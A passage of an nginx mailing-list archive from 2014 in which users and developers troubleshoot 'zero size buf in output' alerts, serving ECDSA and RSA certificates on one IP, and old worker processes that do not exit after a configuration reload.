http://tools.ietf.org/html/rfc2616#section-9.2: Responses to this method are not cacheable. As well as recent RFC 7231, http://tools.ietf.org/html/rfc7231#section-4.3.7: Responses to the OPTIONS method are not cacheable. On the other hand, it should be easy enough to modify the code allow caching of OPTIONS requests. -- Maxim Dounin http://nginx.org/ From arut at nginx.com Fri Sep 19 10:42:26 2014 From: arut at nginx.com (Roman Arutyunyan) Date: Fri, 19 Sep 2014 14:42:26 +0400 Subject: zero size buf in output !! In-Reply-To: References: <20140827171624.GX1849@mdounin.ru> Message-ID: Will this error appear if you try this request again? On 17 Sep 2014, at 16:29, shahzaib shahzaib wrote: > Well, i again received the same error but its much improvement in time frame. If the error was occurring after each 5min, now the same error is occurring after 30~50min. > > The conclusion is, nginx-1.7.4 is not 100% bug free from this issue. > > 2014/09/17 17:22:48 [alert] 28559#0: *27961 zero size buf in output t:0 r:0 f:0 000000000477EE20 000000000477EE20-000000000477FE20 0000000000000000 0-0 while sending to client, client: 115.167.75.22, server: ldx.files.com, request: "GET /files/videos/2014/09/04/140984890338bc7-240.mp4 HTTP/1.1", > > [root at tw data]# nginx -V > nginx version: nginx/1.7.4 > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx --group=nginx --with-http_flv_module --with-http_mp4_module > You have mail in /var/spool/mail/root > > > Regards. > Shahzaib > > On Wed, Sep 17, 2014 at 4:25 PM, shahzaib shahzaib wrote: > Hi Maxim, > > Upgraded nginx to 1.7.4 and looks like the issue is gone. > > Regards. > Shahzaib > > > On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin wrote: > Hello! > > On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: > > > We're facing following error on edge server with nginx-1.6.1, using > > proxy_store on edge. > > > > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 r:0 > > f:0 0000000002579840 0000000002579840-000000000257A840 0000000000000000 0-0 > > while sending to client, client: 119.160.118.123, server: > > storage4.content.com, request: "GET > > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " > > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", host: " > > storage4.content.com" > > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 r:0 > > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 0000000000000000 0-0 > > while sending to client, client: 121.52.147.68, server: storage9.content.com, > > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 HTTP/1.1", > > upstream: " > > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4", > > host: "storage9.content.com", referrer: " > > http://files.com/video/2618018/aashiqui-3-new-songs" > > > > nginx version: nginx/1.6.1 > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > > --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log > > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > > --lock-path=/var/run/nginx.lock > > --http-client-body-temp-path=/var/cache/nginx/client_temp > > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > > --group=nginx --with-http_flv_module --with-http_mp4_module > > You may want to try 1.7.4 to see if it helps (there are some > potentially related changes in nginx 1.7.3). > > If it doesn't, providing debug log may be helpful. See > http://wiki.nginx.org/Debugging for more hints. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From shahzaib.cb at gmail.com Fri Sep 19 10:46:48 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Fri, 19 Sep 2014 15:46:48 +0500 Subject: zero size buf in output !! In-Reply-To: References: <20140827171624.GX1849@mdounin.ru> Message-ID: Nope, it doesn't !! On Fri, Sep 19, 2014 at 3:42 PM, Roman Arutyunyan wrote: > Will this error appear if you try this request again? > > On 17 Sep 2014, at 16:29, shahzaib shahzaib wrote: > > > Well, i again received the same error but its much improvement in time > frame. If the error was occurring after each 5min, now the same error is > occurring after 30~50min. > > > > The conclusion is, nginx-1.7.4 is not 100% bug free from this issue. > > > > 2014/09/17 17:22:48 [alert] 28559#0: *27961 zero size buf in output t:0 > r:0 f:0 000000000477EE20 000000000477EE20-000000000477FE20 0000000000000000 > 0-0 while sending to client, client: 115.167.75.22, server: ldx.files.com, > request: "GET /files/videos/2014/09/04/140984890338bc7-240.mp4 HTTP/1.1", > > > > [root at tw data]# nginx -V > > nginx version: nginx/1.7.4 > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > --lock-path=/var/run/nginx.lock > --http-client-body-temp-path=/var/cache/nginx/client_temp > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > --group=nginx --with-http_flv_module --with-http_mp4_module > > You have mail in /var/spool/mail/root > > > > > > Regards. > > Shahzaib > > > > On Wed, Sep 17, 2014 at 4:25 PM, shahzaib shahzaib < > shahzaib.cb at gmail.com> wrote: > > Hi Maxim, > > > > Upgraded nginx to 1.7.4 and looks like the issue is gone. > > > > Regards. > > Shahzaib > > > > > > On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin > wrote: > > Hello! > > > > On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: > > > > > We're facing following error on edge server with nginx-1.6.1, using > > > proxy_store on edge. > > > > > > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 > r:0 > > > f:0 0000000002579840 0000000002579840-000000000257A840 > 0000000000000000 0-0 > > > while sending to client, client: 119.160.118.123, server: > > > storage4.content.com, request: "GET > > > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " > > > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", > host: " > > > storage4.content.com" > > > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 > r:0 > > > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 > 0000000000000000 0-0 > > > while sending to client, client: 121.52.147.68, server: > storage9.content.com, > > > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 > HTTP/1.1", > > > upstream: " > > > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4 > ", > > > host: "storage9.content.com", referrer: " > > > http://files.com/video/2618018/aashiqui-3-new-songs" > > > > > > nginx version: nginx/1.6.1 > > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > > > --conf-path=/etc/nginx/nginx.conf > --error-log-path=/var/log/nginx/error.log > > > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > > > --lock-path=/var/run/nginx.lock > > > --http-client-body-temp-path=/var/cache/nginx/client_temp > > > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > > > --group=nginx --with-http_flv_module --with-http_mp4_module > > > > You may want to try 1.7.4 to see if it helps (there are some > > potentially related changes in nginx 1.7.3). > > > > If it doesn't, providing debug log may be helpful. See > > http://wiki.nginx.org/Debugging for more hints. > > > > -- > > Maxim Dounin > > http://nginx.org/ > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From shmick at riseup.net Fri Sep 19 13:14:00 2014 From: shmick at riseup.net (shmick at riseup.net) Date: Fri, 19 Sep 2014 23:14:00 +1000 Subject: 2 certs, 1 domain, 1 IP In-Reply-To: <541AEC61.2040804@comodo.com> References: <54184F09.6090205@riseup.net> <5419A60F.9020707@riseup.net> <541AEC61.2040804@comodo.com> Message-ID: <541C2C18.9050102@riseup.net> hi rob, Rob Stradling wrote: > On 17/09/14 16:17, shmick at riseup.net wrote: >> it works with postfix >> i guess not in nginx >> feature request ? > > Hi. You could try this patch: > > http://forum.nginx.org/read.php?29,243797,244306#msg-244306 many thanks sorry but am i missing something ? i cant find where to download the patch on the page either as attachment or text ? > > It's nearly a year old so it may well need tweaking to make it apply > cleanly to the latest Nginx code. I'm afraid I don't know when I'm > going to find time to get it into a suitable state for the Nginx team to > be happy to properly review it and (hopefully) commit it. (So if > anybody else wants to take over, please be my guest). > >> nginx: [emerg] "ssl_certificate" directive is duplicate in >> /etc/nginx.conf:53 >> nginx: configuration file /etc/nginx.conf test failed >> >> shmick at riseup.net wrote: >>> is it possible with SNI and nginx to have both an ECDSA and RSA cert >>> serving 1 website on 1 IP ? >>> >>> best practices ? > From nginx-forum at nginx.us Fri Sep 19 14:13:39 2014 From: nginx-forum at nginx.us (igorhmm) Date: Fri, 19 Sep 2014 10:13:39 -0400 Subject: Worker processes not shutting down In-Reply-To: <8b582656c938132d5f99e41e8aaa817d.NginxMailingListEnglish@forum.nginx.org> References: <8b582656c938132d5f99e41e8aaa817d.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, Did you solved that problem? I'm with the same issue using nginx/1.4.3. Could be related with websockets that are still connected? Some browsers can't connect until that worker be killed? This happens for you too? Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,221591,253418#msg-253418 From rob.stradling at comodo.com Fri Sep 19 14:20:02 2014 From: rob.stradling at comodo.com (Rob Stradling) Date: Fri, 19 Sep 2014 15:20:02 +0100 Subject: 2 certs, 1 domain, 1 IP In-Reply-To: <541C2C18.9050102@riseup.net> References: <54184F09.6090205@riseup.net> <5419A60F.9020707@riseup.net><541AEC61.2040804@comodo.com> <541C2C18.9050102@riseup.net> Message-ID: <541C3B92.3040707@comodo.com> On 19/09/14 14:14, shmick at riseup.net wrote: > hi rob, > > Rob Stradling wrote: >> On 17/09/14 16:17, shmick at riseup.net wrote: >>> it works with postfix >>> i guess not in nginx >>> feature request ? >> >> Hi. You could try this patch: >> >> http://forum.nginx.org/read.php?29,243797,244306#msg-244306 > > many thanks > sorry but am i missing something ? > i cant find where to download the patch on the page either as attachment > or text ? Hmmm, neither can I. I just forwarded the original post to you. >> It's nearly a year old so it may well need tweaking to make it apply >> cleanly to the latest Nginx code. I'm afraid I don't know when I'm >> going to find time to get it into a suitable state for the Nginx team to >> be happy to properly review it and (hopefully) commit it. (So if >> anybody else wants to take over, please be my guest). I've already had one offer of help today. :-) >>> nginx: [emerg] "ssl_certificate" directive is duplicate in >>> /etc/nginx.conf:53 >>> nginx: configuration file /etc/nginx.conf test failed >>> >>> shmick at riseup.net wrote: >>>> is it possible with SNI and nginx to have both an ECDSA and RSA cert >>>> serving 1 website on 1 IP ? >>>> >>>> best practices ? -- Rob Stradling Senior Research & Development Scientist COMODO - Creating Trust Online From vbart at nginx.com Fri Sep 19 14:26:00 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 19 Sep 2014 18:26 +0400 Subject: 2 certs, 1 domain, 1 IP In-Reply-To: <541C3B92.3040707@comodo.com> References: <54184F09.6090205@riseup.net> <541C2C18.9050102@riseup.net> <541C3B92.3040707@comodo.com> Message-ID: <2751037.b4aYs8kZ6I@vbart-laptop> On Friday 19 September 2014 15:20:02 Rob Stradling wrote: > On 19/09/14 14:14, shmick at riseup.net wrote: > > hi rob, > > > > Rob Stradling wrote: > >> On 17/09/14 16:17, shmick at riseup.net wrote: > >>> it works with postfix > >>> i guess not in nginx > >>> feature request ? > >> > >> Hi. You could try this patch: > >> > >> http://forum.nginx.org/read.php?29,243797,244306#msg-244306 > > > > many thanks > > sorry but am i missing something ? > > i cant find where to download the patch on the page either as attachment > > or text ? > > Hmmm, neither can I. > > I just forwarded the original post to you. http://mailman.nginx.org/pipermail/nginx-devel/2013-October/004474.html wbr, Valentin V. Bartenev From arut at nginx.com Fri Sep 19 14:46:11 2014 From: arut at nginx.com (Roman Arutyunyan) Date: Fri, 19 Sep 2014 18:46:11 +0400 Subject: zero size buf in output !! In-Reply-To: References: <20140827171624.GX1849@mdounin.ru> Message-ID: Can you figure out when the error appears? Maybe it appears when the file is downloaded from backend and written to cache (if you have one) or when serving from cache etc. On 19 Sep 2014, at 14:46, shahzaib shahzaib wrote: > Nope, it doesn't !! > > On Fri, Sep 19, 2014 at 3:42 PM, Roman Arutyunyan wrote: > Will this error appear if you try this request again? > > On 17 Sep 2014, at 16:29, shahzaib shahzaib wrote: > > > Well, i again received the same error but its much improvement in time frame. If the error was occurring after each 5min, now the same error is occurring after 30~50min. > > > > The conclusion is, nginx-1.7.4 is not 100% bug free from this issue. > > > > 2014/09/17 17:22:48 [alert] 28559#0: *27961 zero size buf in output t:0 r:0 f:0 000000000477EE20 000000000477EE20-000000000477FE20 0000000000000000 0-0 while sending to client, client: 115.167.75.22, server: ldx.files.com, request: "GET /files/videos/2014/09/04/140984890338bc7-240.mp4 HTTP/1.1", > > > > [root at tw data]# nginx -V > > nginx version: nginx/1.7.4 > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx --group=nginx --with-http_flv_module --with-http_mp4_module > > You have mail in /var/spool/mail/root > > > > > > Regards. > > Shahzaib > > > > On Wed, Sep 17, 2014 at 4:25 PM, shahzaib shahzaib wrote: > > Hi Maxim, > > > > Upgraded nginx to 1.7.4 and looks like the issue is gone. > > > > Regards. > > Shahzaib > > > > > > On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin wrote: > > Hello! > > > > On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: > > > > > We're facing following error on edge server with nginx-1.6.1, using > > > proxy_store on edge. > > > > > > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 r:0 > > > f:0 0000000002579840 0000000002579840-000000000257A840 0000000000000000 0-0 > > > while sending to client, client: 119.160.118.123, server: > > > storage4.content.com, request: "GET > > > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " > > > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", host: " > > > storage4.content.com" > > > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 r:0 > > > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 0000000000000000 0-0 > > > while sending to client, client: 121.52.147.68, server: storage9.content.com, > > > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 HTTP/1.1", > > > upstream: " > > > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4", > > > host: "storage9.content.com", referrer: " > > > http://files.com/video/2618018/aashiqui-3-new-songs" > > > > > > nginx version: nginx/1.6.1 > > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > > > --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log > > > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > > > --lock-path=/var/run/nginx.lock > > > --http-client-body-temp-path=/var/cache/nginx/client_temp > > > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > > > --group=nginx --with-http_flv_module --with-http_mp4_module > > > > You may want to try 1.7.4 to see if it helps (there are some > > potentially related changes in nginx 1.7.3). > > > > If it doesn't, providing debug log may be helpful. See > > http://wiki.nginx.org/Debugging for more hints. > > > > -- > > Maxim Dounin > > http://nginx.org/ > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From reallfqq-nginx at yahoo.fr Fri Sep 19 14:55:05 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Fri, 19 Sep 2014 16:55:05 +0200 Subject: Worker processes not shutting down In-Reply-To: References: <8b582656c938132d5f99e41e8aaa817d.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello, You should read the end of the 1st paragraph of the following section to find your answer: http://nginx.org/en/docs/control.html#reconfiguration If you do not wish to reach all the workers' 'graceful shutdown' conditions, look at the list of signals they handle to find out how to force it: http://nginx.org/en/docs/control.html Happy controlling, --- *B. R.* On Fri, Sep 19, 2014 at 4:13 PM, igorhmm wrote: > Hi, > > Did you solved that problem? I'm with the same issue using nginx/1.4.3. > > Could be related with websockets that are still connected? > > Some browsers can't connect until that worker be killed? This happens for > you too? > > Thanks > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253418#msg-253418 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Sep 19 17:27:30 2014 From: nginx-forum at nginx.us (igorhmm) Date: Fri, 19 Sep 2014 13:27:30 -0400 Subject: Worker processes not shutting down In-Reply-To: References: Message-ID: <2398e55c4d0c9361b10c2ca154290ddc.NginxMailingListEnglish@forum.nginx.org> Hi BR, This helps a lot, but I can't find a explanation for my (temporary) problem. About a hour ago one of our developers can't access port 80, but everything goes fine with https. My nginx is listening http and https in the same server, With help of tcpdump, we could see packets coming in, but nothing getting out. In my newbie understanding, the new worker are ready and got the position, the old worker is waiting all sockets to be closed to quit. That's it? But why this user still without response from http for a long period (more then 20 minutes)? After that, everything come back to work fine. Thanks again Igor Posted at Nginx Forum: http://forum.nginx.org/read.php?2,221591,253428#msg-253428 From reallfqq-nginx at yahoo.fr Fri Sep 19 17:46:17 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Fri, 19 Sep 2014 19:46:17 +0200 Subject: Worker processes not shutting down In-Reply-To: <2398e55c4d0c9361b10c2ca154290ddc.NginxMailingListEnglish@forum.nginx.org> References: <2398e55c4d0c9361b10c2ca154290ddc.NginxMailingListEnglish@forum.nginx.org> Message-ID: Are you able to reproduce the problem? Could you provide steps to do so? Based on what you said, I would suspect a conflict between new and old workers. I do not see in your report where the problem could come from. I suppose it is related, then. Do you know which worker was receiving data? Why did the problem solve itself? Did that happen at the same time as the old workers finally died? What is the difference between handling HTTP and HTTPS in your configuration? Is there any difference on that particular point between old and new configuration? --- *B. R.* On Fri, Sep 19, 2014 at 7:27 PM, igorhmm wrote: > Hi BR, > > This helps a lot, but I can't find a explanation for my (temporary) > problem. > > About a hour ago one of our developers can't access port 80, but everything > goes fine with https. My nginx is listening http and https in the same > server, > > With help of tcpdump, we could see packets coming in, but nothing getting > out. > > In my newbie understanding, the new worker are ready and got the position, > the old worker is waiting all sockets to be closed to quit. That's it? > > But why this user still without response from http for a long period (more > then 20 minutes)? After that, everything come back to work fine. > > Thanks again > > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253428#msg-253428 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Sep 19 19:50:24 2014 From: nginx-forum at nginx.us (igorhmm) Date: Fri, 19 Sep 2014 15:50:24 -0400 Subject: Worker processes not shutting down In-Reply-To: References: Message-ID: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Hi BR, I don't known how to reproduce, not yet :-) I couldn't identify which worker was responding too, but I can see with strace warnings in the old wolker about EAGAIN (Resource temporarily unavailable). I can see that because old workers still running: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND nginx 6009 0.0 0.2 71020 18532 ? S Sep18 0:37 nginx: worker process is shutting down nginx 6010 0.0 0.2 71028 18496 ? S Sep18 0:12 nginx: worker process is shutting down nginx 6289 0.2 0.3 75672 23188 ? S 07:54 0:58 nginx: worker process is shutting down nginx 6290 0.0 0.2 71932 19248 ? S 07:54 0:15 nginx: worker process is shutting down nginx 9182 0.0 0.2 70872 18380 ? S 10:20 0:02 nginx: worker process is shutting down nginx 9295 0.0 0.2 70952 18380 ? S 10:26 0:02 nginx: worker process is shutting down nginx 9297 0.0 0.2 70368 17856 ? S 10:26 0:02 nginx: worker process is shutting down nginx 9302 0.0 0.2 70804 18296 ? S 10:26 0:01 nginx: worker process is shutting down nginx 10132 0.2 0.2 74776 22280 ? S 10:53 0:47 nginx: worker process is shutting down nginx 10133 0.0 0.2 71484 18972 ? S 10:53 0:09 nginx: worker process is shutting down nginx 13690 0.2 0.2 72876 20296 ? S 14:22 0:10 nginx: worker process nginx 13691 0.1 0.2 71492 19088 ? S 14:22 0:07 nginx: worker process nginx 13692 0.0 0.0 57292 3180 ? S 14:22 0:00 nginx: cache manager process root 29863 0.0 0.0 57292 4048 ? Ss Sep11 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf nginx 30956 0.0 0.2 72924 20336 ? S Sep18 0:23 nginx: worker process is shutting down [/code] Looking for our user's usage, this workers will stay online for more few hours :) The difference between old and new configuration is just a "down" flag in one of our servers from our websockets pool (upstream). You can see a simplified version of config on: http://pastebin.com/02GQQ22r Really thanks for your attention. Igor Posted at Nginx Forum: http://forum.nginx.org/read.php?2,221591,253431#msg-253431 From reallfqq-nginx at yahoo.fr Fri Sep 19 20:30:30 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Fri, 19 Sep 2014 22:30:30 +0200 Subject: Worker processes not shutting down In-Reply-To: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> References: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Message-ID: Any hanging/error should be available in your log files. Cross-check access and error logs and you will probably find unusual entries you seek for. --- *B. R.* On Fri, Sep 19, 2014 at 9:50 PM, igorhmm wrote: > Hi BR, > > I don't known how to reproduce, not yet :-) > > I couldn't identify which worker was responding too, but I can see with > strace warnings in the old wolker about EAGAIN (Resource temporarily > unavailable). I can see that because old workers still running: > > USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND > nginx 6009 0.0 0.2 71020 18532 ? S Sep18 0:37 nginx: > worker process is shutting down > nginx 6010 0.0 0.2 71028 18496 ? S Sep18 0:12 nginx: > worker process is shutting down > nginx 6289 0.2 0.3 75672 23188 ? S 07:54 0:58 nginx: > worker process is shutting down > nginx 6290 0.0 0.2 71932 19248 ? S 07:54 0:15 nginx: > worker process is shutting down > nginx 9182 0.0 0.2 70872 18380 ? S 10:20 0:02 nginx: > worker process is shutting down > nginx 9295 0.0 0.2 70952 18380 ? S 10:26 0:02 nginx: > worker process is shutting down > nginx 9297 0.0 0.2 70368 17856 ? S 10:26 0:02 nginx: > worker process is shutting down > nginx 9302 0.0 0.2 70804 18296 ? S 10:26 0:01 nginx: > worker process is shutting down > nginx 10132 0.2 0.2 74776 22280 ? S 10:53 0:47 nginx: > worker process is shutting down > nginx 10133 0.0 0.2 71484 18972 ? S 10:53 0:09 nginx: > worker process is shutting down > nginx 13690 0.2 0.2 72876 20296 ? S 14:22 0:10 nginx: > worker process > nginx 13691 0.1 0.2 71492 19088 ? S 14:22 0:07 nginx: > worker process > nginx 13692 0.0 0.0 57292 3180 ? S 14:22 0:00 nginx: > cache manager process > root 29863 0.0 0.0 57292 4048 ? Ss Sep11 0:00 nginx: > master process /usr/sbin/nginx -c /etc/nginx/nginx.conf > nginx 30956 0.0 0.2 72924 20336 ? S Sep18 0:23 nginx: > worker process is shutting down > [/code] > > Looking for our user's usage, this workers will stay online for more few > hours :) > > The difference between old and new configuration is just a "down" flag in > one of our servers from our websockets pool (upstream). You can see a > simplified version of config on: http://pastebin.com/02GQQ22r > > Really thanks for your attention. > > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253431#msg-253431 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From oscaretu at gmail.com Sat Sep 20 08:16:49 2014 From: oscaretu at gmail.com (oscaretu .) Date: Sat, 20 Sep 2014 10:16:49 +0200 Subject: Worker processes not shutting down In-Reply-To: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> References: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello As another tool to analyze the problem similar to strace but more powerful, I suggest you to try sysdig http://www.sysdig.org/ https://www.google.com/search?client=ubuntu&channel=fs&q=sysdig&ie=utf-8&oe=utf-8 You can do a trace of everything in your system. Greetings, Oscar On Fri, Sep 19, 2014 at 9:50 PM, igorhmm wrote: > Hi BR, > > I don't known how to reproduce, not yet :-) > > I couldn't identify which worker was responding too, but I can see with > strace warnings in the old wolker about EAGAIN (Resource temporarily > unavailable). I can see that because old workers still running: > > USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND > nginx 6009 0.0 0.2 71020 18532 ? S Sep18 0:37 nginx: > worker process is shutting down > nginx 6010 0.0 0.2 71028 18496 ? S Sep18 0:12 nginx: > worker process is shutting down > nginx 6289 0.2 0.3 75672 23188 ? S 07:54 0:58 nginx: > worker process is shutting down > nginx 6290 0.0 0.2 71932 19248 ? S 07:54 0:15 nginx: > worker process is shutting down > nginx 9182 0.0 0.2 70872 18380 ? S 10:20 0:02 nginx: > worker process is shutting down > nginx 9295 0.0 0.2 70952 18380 ? S 10:26 0:02 nginx: > worker process is shutting down > nginx 9297 0.0 0.2 70368 17856 ? S 10:26 0:02 nginx: > worker process is shutting down > nginx 9302 0.0 0.2 70804 18296 ? S 10:26 0:01 nginx: > worker process is shutting down > nginx 10132 0.2 0.2 74776 22280 ? S 10:53 0:47 nginx: > worker process is shutting down > nginx 10133 0.0 0.2 71484 18972 ? S 10:53 0:09 nginx: > worker process is shutting down > nginx 13690 0.2 0.2 72876 20296 ? S 14:22 0:10 nginx: > worker process > nginx 13691 0.1 0.2 71492 19088 ? S 14:22 0:07 nginx: > worker process > nginx 13692 0.0 0.0 57292 3180 ? S 14:22 0:00 nginx: > cache manager process > root 29863 0.0 0.0 57292 4048 ? Ss Sep11 0:00 nginx: > master process /usr/sbin/nginx -c /etc/nginx/nginx.conf > nginx 30956 0.0 0.2 72924 20336 ? S Sep18 0:23 nginx: > worker process is shutting down > [/code] > > Looking for our user's usage, this workers will stay online for more few > hours :) > > The difference between old and new configuration is just a "down" flag in > one of our servers from our websockets pool (upstream). You can see a > simplified version of config on: http://pastebin.com/02GQQ22r > > Really thanks for your attention. > > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253431#msg-253431 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Oscar Fernandez Sierra oscaretu at gmail.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From dewanggaba at xtremenitro.org Sat Sep 20 08:19:30 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Sat, 20 Sep 2014 15:19:30 +0700 Subject: Worker processes not shutting down In-Reply-To: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> References: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Message-ID: <541D3892.5090907@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, Which one do you use to reloading the config? `restart` or `reload` command? On 9/20/2014 02:50, igorhmm wrote: > Hi BR, > > I don't known how to reproduce, not yet :-) > > I couldn't identify which worker was responding too, but I can see > with strace warnings in the old wolker about EAGAIN (Resource > temporarily unavailable). I can see that because old workers still > running: > > USER PID %CPU %MEM VSZ RSS TTY STAT START TIME > COMMAND nginx 6009 0.0 0.2 71020 18532 ? S Sep18 > 0:37 nginx: worker process is shutting down nginx 6010 0.0 > 0.2 71028 18496 ? S Sep18 0:12 nginx: worker process > is shutting down nginx 6289 0.2 0.3 75672 23188 ? S > 07:54 0:58 nginx: worker process is shutting down nginx 6290 > 0.0 0.2 71932 19248 ? S 07:54 0:15 nginx: worker > process is shutting down nginx 9182 0.0 0.2 70872 18380 ? > S 10:20 0:02 nginx: worker process is shutting down nginx > 9295 0.0 0.2 70952 18380 ? S 10:26 0:02 nginx: > worker process is shutting down nginx 9297 0.0 0.2 70368 > 17856 ? S 10:26 0:02 nginx: worker process is shutting > down nginx 9302 0.0 0.2 70804 18296 ? 